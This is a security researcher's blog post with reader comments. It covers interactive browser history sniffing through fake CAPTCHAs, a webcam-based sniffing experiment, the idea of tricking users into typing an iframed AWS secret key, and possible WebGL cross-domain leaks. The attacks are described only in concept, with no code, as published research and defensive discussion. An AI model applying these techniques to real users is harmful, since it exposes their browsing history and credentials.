Interactive history sniffing and its relatives

Readers of this blog will probably already know that, up till the middle of last year, it was possible to sniff browsing history by clever tricks involving CSS, JavaScript, and the venerable tradition of drawing hyperlinks to already-visited URLs in purple instead of blue. Last year, though, David Baron came up with a defense against history sniffing which has now been adopted by every major browser except Opera. One fewer thing to worry about when visiting the internets, hooray? Not so fast.

Imagine for a moment that the next time you visited an unfamiliar website and you wanted to leave a comment without creating an account, instead of one of those illegibly distorted codes that you have to type back in, you saw this:

Please click on all the chess pawns.

<img class=aligncenter src=chessboard-example.png alt=A six-by-six checkerboard grid with chess pawns in random locations. One of the pawns is green and has a mouse-cursor arrow pointing to it.“>

As you click on the pawns, they turn green. Nifty, innit? Much easier than an illegibly distorted code. Also easy for a spambot equipped with image processing software, but it turns out the distorted codes are not that hard for spambots anymore either and probably no one’s written the necessary image processing code for this one yet. Possibly also easier on people with poor eyesight, and there could still be a link to an audio challenge for people with no eyesight.

… What’s this got to do with history sniffing? That chessboard isn’t really a CAPTCHA. All the squares have pawns on them. But each one is a hyperlink, and the pawns linked to sites you haven’t visited are being drawn in the same color as the square, so they’re invisible. You only click on the pawns you can see, of course, and so you reveal to the site which of those URLs you have visited. A little technical cleverness is required—the pawns have to be Unicode dingbats, not images; all the normal interactive behavior of hyperlinks has to be suppressed; etcetera—but nothing too difficult. I and three other researchers with CMU Silicon Valley’s Web Security Group have tested this and a few other such fake CAPTCHAs on 300 people. We found them to be practical, although you have to be careful not to make the task too hard; for details please see our paper (to be presented at the IEEE Symposium on Security and Privacy, aka Oakland 2011).

An attacker obviously can’t use an interactive sniffing attack like this one to find out which sites out of the entire Alexa 10K your victim has visited—nobody’s going to work through that many chessboards—and for the same reason, deanonymization attacks that require the attacker to probe hundreds of thousands of URLs are out of reach. However, an attacker could reasonably probe a couple hundred URLs with an interactive attack, and according to Dongseok Jang’s study of actual history sniffing (paper), that’s about how many URLs real attackers want to sniff. It seems that the main thing real attackers want to know about your browsing history is which of their competitors you patronize, and that’s never going to need more than a few dozen URLs.

On the other hand, CAPTCHAs are such a hassle for users that they cause 10% to 33% attrition in conversion rates. And users don’t expect to see them on every visit to a site—just the first, usually, or each time they submit an anonymous comment. Even websites that were sniffing history when it was possible to do so automatically, and want to keep doing it, may consider that too high a price. But we can imagine similar attacks on higher-value information, where even a tiny success rate would be worth it. For instance, a malicious site could ask you to type a string of gibberish to continue—which happens to be your Amazon Web Services secret access key, IFRAMEd in from their management console. Amazon has taken steps to make this precise scenario difficult, but I’m not prepared to swear that it’s impossible, and other cloud services providers may have been less cautious.

Going forward, we also need to think carefully about how new web-platform capabilities might enable attackers to make similar end-runs around the browser’s security policies. In the aforementioned research project, we were also able to sniff history without user interaction by using a webcam to detect the color of the light reflecting off the user’s face; even with our remarkably crude image processing code this worked great as long as the user held still. It’s not terribly practical, because the user has to grant access to their webcam, and it involves putting an annoying flashing box on the screen, but it demonstrates the problem. We are particularly concerned about WebGL right now, since its shader programs can perform arbitrary computations and have access to cross-domain content that page JavaScript cannot see; there may well be a way for them to communicate back to page JavaScript that avoids the <canvas> element’s information leakage rules. Right now it’s not possible to put the rendering of a web page into a GL texture, so this couldn’t be used to snoop on browsing history, but there’s legitimate reasons to want to do that, so it might become possible in the future.

Responses to “Interactive history sniffing and its relatives”

  1. voracity

    Interesting and important to think about, but I don’t see much to be concerned about. Especially since each of these attacks requires the user to first visit a malicious site, which is pretty rare, and then to interact with it in a pretty extensive way, which is even rarer.

    Also, I’ve anecdotally noticed that the incidence of such visits (by the range of people I’m familiar with) has been decreasing gradually over time as their online experience grows. (It would be wonderful to get some data to find out if this is generally the case.)

    And I’m happy to see that blocking 3rd party cookies by default is in the plans for upcoming Firefox versions. I’ve been pleading for this for a very long time. (That would resolve the Amazon issue, no?) ALL user-specific 3rd party information should be blocked by default! (Like XHR, visited links, etc.)

    1. Zack Weinberg
      …each of these attacks requires the user to first visit a malicious site, which is pretty rare, and then to interact with it in a pretty extensive way, which is even rarer.

      Right, that’s why I said I was more concerned with similar attacks on higher-value information. You only need to steal a few AWS secret keys to make it worth the trouble.

      …the incidence of such visits (by the range of people I’m familiar with) has been decreasing gradually over time as their online experience grows. (It would be wonderful to get some data to find out if this is generally the case.)

      Off the top of my head, I don’t see how to do that study in an ethical way, but if you have ideas, I’d love to hear them.

      ALL user-specific 3rd party information should be blocked by default!

      The trouble is doing that without breaking the Web … my bank’s website, for instance, breaks horribly with third-party cookies disabled, and they will not be persuaded to change it (I’ve tried).

      I am increasingly of the opinion that everything, even images, should require an opt-in in the HTTP headers to be loadable cross-domain, but we’d need a time machine to change that one.

      1. voracity

        You only need to steal a few AWS secret keys to make it worth the trouble.

        Granted. But the keys (or secrets) stolen have to be important ones and phishers can’t be choosers. And as the importance of a secret increases, so too does the number of security measures employed to protect it. I’m not suggesting that a big breach can’t happen. (Importance isn’t always recognised; Sony’s recent issues ram this point home, even if that was the result of a more traditional open backdoor.) I’m suggesting the probability (or, rather, expected cost) is low enough that these issues can be set aside in favour of the holy grail: proper protection of all user-specific 3rd party communications.

        The trouble is doing that without breaking the Web.

        I would have thought the current situation is grievous enough for all browser makers to unite and fix the problem — there are plenty of self-interest reasons to unite for this one. Have there been discussions amongst the browser makers about it?

  2. Benoit Jacob

    Let me know if you have questions about WebGL.

    I’m not sure what’s meant with have access to cross-domain content that page JavaScript cannot see; do you mean in the case of a very serious vulnerability in the graphics drivers? In that case, we would respond by blacklisting these drivers. We have blacklisted WebGL on Mac OS 10.5 altogether for exactly that reason.

    My main concern about WebGL is how it leaks more bits of uniquely identifying information (fingerprinting). I’m available to discuss this too if you are interested.

    1. Zack Weinberg

      I mean loading an <img> or a <video> cross-domain, pulling its contents into a texture, and then looping over the pixels in a shader. This is allowed by the spec, but the resulting canvas contents are tainted, so page JS can’t read them. But there may be a covert channel that the shader can use to tell page JS what it saw - maybe only one bit (rendering completion time?) but that would be enough for some attacks.

      Image contents are usually not that sensitive, but you never know.

      1. Benoit Jacob

        OK. The only that I can see that JS could read that data would be via a webgl.readPixels() call on a framebuffer to which the said texture would have been blitted. The readPixels() function already has safety checks, but I’m not sure off hand if it handles the case you are describing.

          1. Benoit Jacob

            I checked the implementation, it calls nsContentUtils::IsCallerTrustedForRead().

          2. Zack Weinberg

            That effectively makes it chrome-only. It might not be necessary to be that restrictive.

  3. Benoit Jacob

    We have a plan to add a chrome (as opposed to content) only WebGL extension allowing to read arbitrary DOM elements into textures, mostly to help the GSOC project on Tilt. But obviously we’re not going to allow content to do that.

    1. Zack Weinberg

      There’s already canvas.drawWindow that only chrome can use. Thing is, I can think of legitimate uses for that within a web application … shame about all the cross-domain information leakage worms.

      1. Benoit Jacob

        The problem with drawWindow is that if we are using hardware-accelerated layers, it’s too bad for performance to have to read textures back into main memory. A webgl extension to load DOM elements into textures would have the advantage that it stuff is already in texture memory, it can stay there.

        1. Zack Weinberg

          From my (security) perspective, it doesn’t matter how the image of a rendered page gets to a place where shader programs can examine its pixels…

          1. Benoit Jacob

            Understood; anyway, our WebGL extension would be chrome-only, too.